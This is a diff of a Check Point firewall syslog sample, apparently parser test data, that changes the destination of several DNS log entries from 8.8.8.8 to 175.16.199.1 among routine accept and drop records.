 <134>1 2020-03-29T21:10:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810ec0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52196"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T21:10:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810ec0,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50810"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10490"; xlatesrc:"0.0.0.0"]
@@ -5466,16 +5466,16 @@
 <134>1 2020-03-29T21:13:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810f92,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53044"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T21:13:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810f92,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37540"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10511"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T21:13:55Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e810f95,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50186"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
-<134>1 2020-03-29T21:14:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810f9d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48492"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T21:14:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810f9d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516445"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41912"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T21:14:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fa7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516455"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59451"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T21:14:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fa7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516455"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55735"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:14:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810f9d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48492"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:14:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810f9d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516445"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41912"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:14:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fa7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516455"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59451"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:14:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fa7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516455"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55735"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T21:14:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810fa9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T21:14:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fad,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38990"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T21:14:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fb1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516465"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37843"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T21:14:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fb1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516465"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45614"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T21:14:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fbb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516475"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33106"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T21:14:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fbb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516475"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43085"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:14:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fb1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516465"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37843"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:14:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fb1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516465"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45614"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:14:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fbb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516475"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33106"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:14:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fbb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516475"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43085"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T21:14:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810fbd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T21:14:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810fcd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51736"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T21:14:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810fcd,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51737"; service:"443"; service_id:"https"; src:"192.168.1.117"]
@@ -5559,23 +5559,23 @@
 <134>1 2020-03-29T21:23:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111d6,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37790"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10525"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T21:23:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111d6,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59065"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T21:23:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111d6,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57874"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10526"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T21:23:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111e0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57972"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
